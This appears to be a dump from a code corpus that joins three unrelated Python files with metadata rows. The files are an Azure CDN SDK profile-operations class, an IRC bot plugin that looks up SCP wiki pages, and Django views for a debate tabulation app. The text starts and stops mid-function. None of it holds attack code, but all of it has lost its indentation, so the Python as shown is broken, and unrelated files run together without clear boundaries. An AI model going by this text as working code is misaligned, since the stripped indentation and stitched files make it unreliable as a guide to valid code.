'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(
request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorResponseException(self._deserialize, response)
return response
# Deserialize response
deserialized = models.ProfilePaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.ProfilePaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Cdn/profiles'}
def list_by_resource_group(
self, resource_group_name, custom_headers=None, raw=False, **operation_config):
"""Lists all of the CDN profiles within a resource group.
:param resource_group_name: Name of the Resource group within the
Azure subscription.
:type resource_group_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of Profile
:rtype:
~azure.mgmt.cdn.models.ProfilePaged[~azure.mgmt.cdn.models.Profile]
:raises:
:class:`ErrorResponseException<azure.mgmt.cdn.models.ErrorResponseException>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = self.list_by_resource_group.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(
request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorResponseException(self._deserialize, response)
return response
# Deserialize response
deserialized = models.ProfilePaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.ProfilePaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Cdn/profiles'}
def get(
self, resource_group_name, profile_name, custom_headers=None, raw=False, **operation_config):
"""Gets a CDN profile with the specified profile name under the specified
subscription and resource group.
:param resource_group_name: Name of the Resource group within the
Azure subscription.
:type resource_group_name: str
:param profile_name: Name of the CDN profile which is unique within
the resource group.
:type profile_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Profile or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.cdn.models.Profile or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorResponseException<azure.mgmt.cdn.models.ErrorResponseException>`
"""
# Construct URL
url = self.get.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'profileName': self._serialize.url("profile_name", profile_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorResponseException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Profile', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Cdn/profiles/{profileName}'}
def _create_initial(
self, resource_group_name, profile_name, profile, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.create.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'profileName': self._serialize.url("profile_name", profile_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(profile, 'Profile')
# Construct and send request
request = self._client.put(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, stream=False, **operation_config)
if response.status_code not in [200, 201, 202]:
raise models.ErrorResponseException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Profile', response)
if response.status_code == 201:
deserialized = self._deserialize('Profile', response)
if response.status_code == 202:
deserialized = self._deserialize('Profile', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def create(
self, resource_group_name, profile_name, profile, custom_headers=None, raw=False, **operation_config):
"""Creates a new CDN profile with a profile name under the specified
subscription and resource group.
:param resource_group_name: Name of the Resource group within the
Azure subscription.
:type resource_group_name: str
:param profile_name: Name of the CDN profile which is unique within
the resource group.
:type profile_name: str
:param profile: Profile properties needed to create a new profile.
:type profile: ~azure.mgmt.cdn.models.Profile
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:return: An instance of AzureOperationPoller that returns Profile or
ClientRawResponse if raw=true
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.cdn.models.Profile]
or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorResponseException<azure.mgmt.cdn.models.ErrorResponseException>`
"""
raw_result = self._create_initial(
resource_group_name=resource_group_name,
profile_name=profile_name,
profile=profile,
custom_headers=custom_headers,
raw=True,
**operation_config
)
if raw:
return raw_result
# Construct and send request
def long_running_send():
return raw_result.response
def get_long_running_status(status_link, headers=None):
request = self._client.get(status_link)
if headers:
request.headers.update(headers)
header_parameters = {}
header_parameters['x-ms-client-request-id'] = raw_result.response.request.headers['x-ms-client-request-id']
return self._client.send(
request, header_parameters, stream=False, **operation_config)
def get_long_running_output(response):
if response.status_code not in [200, 201, 202]:
raise models.ErrorResponseException(self._deserialize, response)
deserialized = self._deserialize('Profile', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
long_running_operation_timeout = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
return AzureOperationPoller(
long_running_send, get_long_running_output,
get_long_running_status, long_running_operation_timeout)
create.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Cdn/profiles/{profileName}'}
def _update_initial(
self, resource_group_name, profile_name, tags=None, custom_headers=None, raw=False, **operation_config):
profile_update_parameters = models.ProfileUpdateParameters(tags=tags)
# Construct URL
url = self.update.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'profileName': self._serialize.url("profile_name", profile_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(profile_update_parameters, 'ProfileUpdateParameters')
# Construct and send request
request = self._client.patch(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, stream=False, **operation_config)
if response.status_code not in [200, 202]:
raise models.ErrorResponseException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Profile', response)
if response.status_code == 202:
deserialized = self._deserialize('Profile', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def update(
self, resource_group_name, profile_name, tags=None, custom_headers=None, raw=False, **operation_config):
"""Updates an existing CDN profile with the specified profile name under
the specified subscription and resource group.
:param resource_group_name: Name of the Resource group within the
Azure subscription.
:type resource_group_name: str
:param profile_name: Name of the CDN profile which is unique within
the resource group.
:type profile_name: str
:param tags: Profile tags
:type tags: dict[str, str]
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:return: An instance of AzureOperationPoller that returns Profile or
ClientRawResponse if raw=true
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.cdn.models.Profile]
or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorResponseException<azure.mgmt.cdn.models.ErrorResponseException>`
"""
raw_result = self._update_initial(
resource_group_name=resource_group_name,
profile_name=profile_name,
tags=tags,
custom_headers=custom_headers,
raw=True,
**operation_config
)
if raw:
return raw_result
# Construct and send request
def long_running_send():
return raw_result.response
def get_long_running_status(status_link, headers=None):
request = self._client.get(status_link)
if headers:
request.headers.update(headers)
header_parameters = {}
header_parameters['x-ms-client-request-id'] = raw_result.response.request.headers['x-ms-client-request-id']
return self._client.send(
request, header_parameters, stream=False, **operation_config)
def get_long_running_output(response):
if response.status_code not in [200, 202]:
raise models.ErrorResponseException(self._deserialize, response)
deserialized = self._deserialize('Profile', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
long_running_operation_timeout = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
return AzureOperationPoller(
long_running_send, get_long_running_output,
get_long_running_status, long_running_operation_timeout)
update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Cdn/profiles/{profileName}'}
def _delete_initial(
self, resource_group_name, profile_name, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.delete.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'profileName': self._serialize.url("profile_name", profile_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [202, 204]:
raise models.ErrorResponseException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def delete(
self, resource_group_name, profile_name, custom_headers=None, raw=False, **operation_config):
"""Deletes an existing CDN profile with the specified parameters. Deleting
a profile will result in the deletion of all of the sub-resources
including endpoints, origins and custom domains.
:param resource_group_name: Name of the Resource group within the
Azure subscription.
:type resource_group_name: str
:param profile_name: Name of the CDN profile which is unique within
the resource group.
:type profile_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:return: An instance of AzureOperationPoller that returns None or
ClientRawResponse if raw=true
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorResponseException<azure.mgmt.cdn.models.ErrorResponseException>`
"""
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
profile_name=profile_name,
custom_headers=custom_headers,
raw=True,
**operation_config
)
if raw:
return raw_result
# Construct and send request
def long_running_send():
return raw_result.response
def get_long_running_status(status_link, headers=None):
request = self._client.get(status_link)
if headers:
request.headers.update(headers)
header_parameters = {}
header_parameters['x-ms-client-request-id'] = raw_result.response.request.headers['x-ms-client-request-id']
return self._client.send(
request, header_parameters, stream=False, **operation_config)
def get_long_running_output(response):
if response.status_code not in [202, 204]:
raise models.ErrorResponseException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
long_running_operation_timeout = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
return AzureOperationPoller(
long_running_send, get_long_running_output,
get_long_running_status, long_running_operation_timeout)
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Cdn/profiles/{profileName}'}
def generate_sso_uri(
self, resource_group_name, profile_name, custom_headers=None, raw=False, **operation_config):
"""Generates a dynamic SSO URI used to sign in to the CDN supplemental
portal. Supplemnetal portal is used to configure advanced feature
capabilities that are not yet available in the Azure portal, such as
core reports in a standard profile; rules engine, advanced HTTP
reports, and real-time stats and alerts in a premium profile. The SSO
URI changes approximately every 10 minutes.
:param resource_group_name: Name of the Resource group within the
Azure subscription.
:type resource_group_name: str
:param profile_name: Name of the CDN profile which is unique within
the resource group.
:type profile_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: SsoUri or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.cdn.models.SsoUri or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorResponseException<azure.mgmt.cdn.models.ErrorResponseException>`
"""
# Construct URL
url = self.generate_sso_uri.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'profileName': self._serialize.url("profile_name", profile_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorResponseException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('SsoUri', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
generate_sso_uri.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Cdn/profiles/{profileName}/generateSsoUri'}
def list_supported_optimization_types(
self, resource_group_name, profile_name, custom_headers=None, raw=False, **operation_config):
"""Gets the supported optimization types for the current profile. A user
can create an endpoint with an optimization type from the listed
values.
:param resource_group_name: Name of the Resource group within the
Azure subscription.
:type resource_group_name: str
:param profile_name: Name of the CDN profile which is unique within
the resource group.
:type profile_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: SupportedOptimizationTypesListResult or ClientRawResponse if
raw=true
:rtype: ~azure.mgmt.cdn.models.SupportedOptimizationTypesListResult or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorResponseException<azure.mgmt.cdn.models.ErrorResponseException>`
"""
# Construct URL
url = self.list_supported_optimization_types.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'profileName': self._serialize.url("profile_name", profile_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorResponseException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('SupportedOptimizationTypesListResult', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
list_supported_optimization_types.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Cdn/profiles/{profileName}/getSupportedOptimizationTypes'}
def list_resource_usage(
self, resource_group_name, profile_name, custom_headers=None, raw=False, **operation_config):
"""Checks the quota and actual usage of endpoints under the given CDN
profile.
:param resource_group_name: Name of the Resource group within the
Azure subscription.
:type resource_group_name: str
:param profile_name: Name of the CDN profile which is unique within
the resource group.
:type profile_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of ResourceUsage
:rtype:
~azure.mgmt.cdn.models.ResourceUsagePaged[~azure.mgmt.cdn.models.ResourceUsage]
:raises:
:class:`ErrorResponseException<azure.mgmt.cdn.models.ErrorResponseException>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = self.list_resource_usage.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'profileName': self._serialize.url("profile_name", profile_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(
request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorResponseException(self._deserialize, response)
return response
# Deserialize response
deserialized = models.ResourceUsagePaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.ResourceUsagePaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
list_resource_usage.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Cdn/profiles/{profileName}/checkResourceUsage'}
| mit | 488,939,134,406,142,200 | 45.082697 | 203 | 0.640844 | false |
pixeltasim/IRCBot-Pixeltasim | plugins/scp.py | 1 | 1594 | from whiffle import wikidotapi
from util import hook
import re
import time,threading
@hook.command
def scp(inp): #this is for WL use, easily adaptable to SCP
".scp <Article #> -- Will return exact match of 'SCP-Article#'"
api = wikidotapi.connection() #creates API connection
api.Site = "scp-wiki"
pages = api.refresh_pages() #refresh page list provided by the API, is only a list of strings
line = re.sub("[ ,']",'-',inp) #removes spaces and apostrophes and replaces them with dashes, per wikidot's standards
for page in pages:
if "scp-"+line.lower() == page: #check for first match to input
if api.page_exists(page.lower()): #only api call in .tale, verification of page existence
try: #must do error handling as the key will be wrong for most of the items
if "scp" in api.get_page_item(page,"tags"): #check for tag
rating = api.get_page_item(page,"rating")
if rating < 0:
ratesign = "-"
if rating >= 0:
ratesign = "+" #adds + or minus sign in front of rating
ratestring = "Rating["+ratesign+str(rating)+"]"
author = api.get_page_item(page,"created_by")
authorstring = "Written by "+author
title = api.get_page_item(page,"title")
sepstring = ", "
return "nonick::"+title+" ("+ratestring+sepstring+authorstring+") - http://scp-wiki.net/"+page.lower() #returns the string, nonick:: means that the caller's nick isn't prefixed
except KeyError:
pass
else:
return "nonick::Match found but page does not exist, please consult pixeltasim for error."
return "nonick::Page not found"
| unlicense | 500,851,740,016,759,800 | 45.911765 | 184 | 0.673149 | false |
jolynch/mit-tab | mittab/apps/tab/views.py | 1 | 14458 | from django.contrib.auth.decorators import permission_required
from django.contrib.auth import logout
from django.conf import settings
from django.http import HttpResponse, JsonResponse, Http404
from django.shortcuts import render, reverse, get_object_or_404
import yaml
from mittab.apps.tab.archive import ArchiveExporter
from mittab.apps.tab.forms import SchoolForm, RoomForm, UploadDataForm, ScratchForm, \
SettingsForm
from mittab.apps.tab.helpers import redirect_and_flash_error, \
redirect_and_flash_success
from mittab.apps.tab.models import *
from mittab.libs import cache_logic
from mittab.libs.tab_logic import TabFlags
from mittab.libs.data_import import import_judges, import_rooms, import_teams, \
import_scratches
def index(request):
number_teams = Team.objects.count()
number_judges = Judge.objects.count()
number_schools = School.objects.count()
number_debaters = Debater.objects.count()
number_rooms = Room.objects.count()
school_list = [(school.pk, school.name) for school in School.objects.all()]
judge_list = [(judge.pk, judge.name) for judge in Judge.objects.all()]
team_list = [(team.pk, team.display_backend) for team in Team.objects.all()]
debater_list = [(debater.pk, debater.display)
for debater in Debater.objects.all()]
room_list = [(room.pk, room.name) for room in Room.objects.all()]
return render(request, "common/index.html", locals())
def tab_logout(request, *args):
logout(request)
return redirect_and_flash_success(request,
"Successfully logged out",
path="/")
def render_403(request, *args, **kwargs):
response = render(request, "common/403.html")
response.status_code = 403
return response
def render_404(request, *args, **kwargs):
response = render(request, "common/404.html")
response.status_code = 404
return response
def render_500(request, *args, **kwargs):
response = render(request, "common/500.html")
response.status_code = 500
return response
#View for manually adding scratches
def add_scratch(request):
if request.method == "POST":
form = ScratchForm(request.POST)
if form.is_valid():
form.save()
return redirect_and_flash_success(request,
"Scratch created successfully")
else:
form = ScratchForm(initial={"scratch_type": 0})
return render(request, "common/data_entry.html", {
"title": "Adding Scratch",
"form": form
})
#### BEGIN SCHOOL ###
#Three views for entering, viewing, and editing schools
def view_schools(request):
#Get a list of (id,school_name) tuples
c_schools = [(s.pk, s.name, 0, "") for s in School.objects.all()]
return render(
request, "common/list_data.html", {
"item_type": "school",
"title": "Viewing All Schools",
"item_list": c_schools
})
def view_school(request, school_id):
school_id = int(school_id)
try:
school = School.objects.get(pk=school_id)
except School.DoesNotExist:
return redirect_and_flash_error(request, "School not found")
if request.method == "POST":
form = SchoolForm(request.POST, instance=school)
if form.is_valid():
try:
form.save()
except ValueError:
return redirect_and_flash_error(
request,
"School name cannot be validated, most likely a non-existent school"
)
return redirect_and_flash_success(
request, "School {} updated successfully".format(
form.cleaned_data["name"]))
else:
form = SchoolForm(instance=school)
links = [("/school/" + str(school_id) + "/delete/", "Delete")]
return render(
request, "common/data_entry.html", {
"form": form,
"links": links,
"title": "Viewing School: %s" % (school.name)
})
def enter_school(request):
if request.method == "POST":
form = SchoolForm(request.POST)
if form.is_valid():
try:
form.save()
except ValueError:
return redirect_and_flash_error(
request,
"School name cannot be validated, most likely a duplicate school"
)
return redirect_and_flash_success(
request,
"School {} created successfully".format(
form.cleaned_data["name"]),
path="/")
else:
form = SchoolForm()
return render(request, "common/data_entry.html", {
"form": form,
"title": "Create School"
})
@permission_required("tab.school.can_delete", login_url="/403/")
def delete_school(request, school_id):
error_msg = None
try:
school_id = int(school_id)
school = School.objects.get(pk=school_id)
school.delete()
except School.DoesNotExist:
error_msg = "That school does not exist"
except Exception as e:
error_msg = str(e)
if error_msg:
return redirect_and_flash_error(request, error_msg)
return redirect_and_flash_success(request,
"School deleted successfully",
path="/")
#### END SCHOOL ###
#### BEGIN ROOM ###
def view_rooms(request):
def flags(room):
result = 0
if room.rank == 0:
result |= TabFlags.ROOM_ZERO_RANK
else:
result |= TabFlags.ROOM_NON_ZERO_RANK
return result
all_flags = [[TabFlags.ROOM_ZERO_RANK, TabFlags.ROOM_NON_ZERO_RANK]]
all_rooms = [(room.pk, room.name, flags(room),
TabFlags.flags_to_symbols(flags(room)))
for room in Room.objects.all()]
filters, symbol_text = TabFlags.get_filters_and_symbols(all_flags)
return render(
request, "common/list_data.html", {
"item_type": "room",
"title": "Viewing All Rooms",
"item_list": all_rooms,
"symbol_text": symbol_text,
"filters": filters
})
def view_room(request, room_id):
room_id = int(room_id)
try:
room = Room.objects.get(pk=room_id)
except Room.DoesNotExist:
return redirect_and_flash_error(request, "Room not found")
if request.method == "POST":
form = RoomForm(request.POST, instance=room)
if form.is_valid():
try:
form.save()
except ValueError:
return redirect_and_flash_error(
request,
"Room name cannot be validated, most likely a non-existent room"
)
return redirect_and_flash_success(
request, "School {} updated successfully".format(
form.cleaned_data["name"]))
else:
form = RoomForm(instance=room)
return render(request, "common/data_entry.html", {
"form": form,
"links": [],
"title": "Viewing Room: %s" % (room.name)
})
def enter_room(request):
if request.method == "POST":
form = RoomForm(request.POST)
if form.is_valid():
try:
form.save()
except ValueError:
return redirect_and_flash_error(
request,
"Room name cannot be validated, most likely a duplicate room"
)
return redirect_and_flash_success(
request,
"Room {} created successfully".format(
form.cleaned_data["name"]),
path="/")
else:
form = RoomForm()
return render(request, "common/data_entry.html", {
"form": form,
"title": "Create Room"
})
def batch_checkin(request):
rooms_and_checkins = []
round_numbers = list([i + 1 for i in range(TabSettings.get("tot_rounds"))])
for room in Room.objects.all():
checkins = []
for round_number in [0] + round_numbers: # 0 is for outrounds
checkins.append(room.is_checked_in_for_round(round_number))
rooms_and_checkins.append((room, checkins))
return render(request, "tab/room_batch_checkin.html", {
"rooms_and_checkins": rooms_and_checkins,
"round_numbers": round_numbers
})
@permission_required("tab.tab_settings.can_change", login_url="/403")
def room_check_in(request, room_id, round_number):
room_id, round_number = int(room_id), int(round_number)
if round_number < 0 or round_number > TabSettings.get("tot_rounds"):
# 0 is so that outrounds don't throw an error
raise Http404("Round does not exist")
room = get_object_or_404(Room, pk=room_id)
if request.method == "POST":
if not room.is_checked_in_for_round(round_number):
check_in = RoomCheckIn(room=room, round_number=round_number)
check_in.save()
elif request.method == "DELETE":
if room.is_checked_in_for_round(round_number):
check_ins = RoomCheckIn.objects.filter(room=room,
round_number=round_number)
check_ins.delete()
else:
raise Http404("Must be POST or DELETE")
return JsonResponse({"success": True})
@permission_required("tab.scratch.can_delete", login_url="/403/")
def delete_scratch(request, item_id, scratch_id):
try:
scratch_id = int(scratch_id)
scratch = Scratch.objects.get(pk=scratch_id)
scratch.delete()
except Scratch.DoesNotExist:
return redirect_and_flash_error(
request,
"This scratch does not exist, please try again with a valid id.")
return redirect_and_flash_success(request,
"Scratch deleted successfully",
path="/")
def view_scratches(request):
# Get a list of (id,school_name) tuples
c_scratches = [(s.team.pk, str(s), 0, "") for s in Scratch.objects.all()]
return render(
request, "common/list_data.html", {
"item_type": "team",
"title": "Viewing All Scratches for Teams",
"item_list": c_scratches
})
def get_settings_from_yaml():
default_settings = []
with open(settings.SETTING_YAML_PATH, "r") as stream:
default_settings = yaml.safe_load(stream)
to_return = []
for setting in default_settings:
tab_setting = TabSettings.objects.filter(key=setting["name"]).first()
if tab_setting:
if "type" in setting and setting["type"] == "boolean":
setting["value"] = tab_setting.value == 1
else:
setting["value"] = tab_setting.value
to_return.append(setting)
return to_return
### SETTINGS VIEWS ###
@permission_required("tab.tab_settings.can_change", login_url="/403/")
def settings_form(request):
yaml_settings = get_settings_from_yaml()
if request.method == "POST":
_settings_form = SettingsForm(request.POST, settings=yaml_settings)
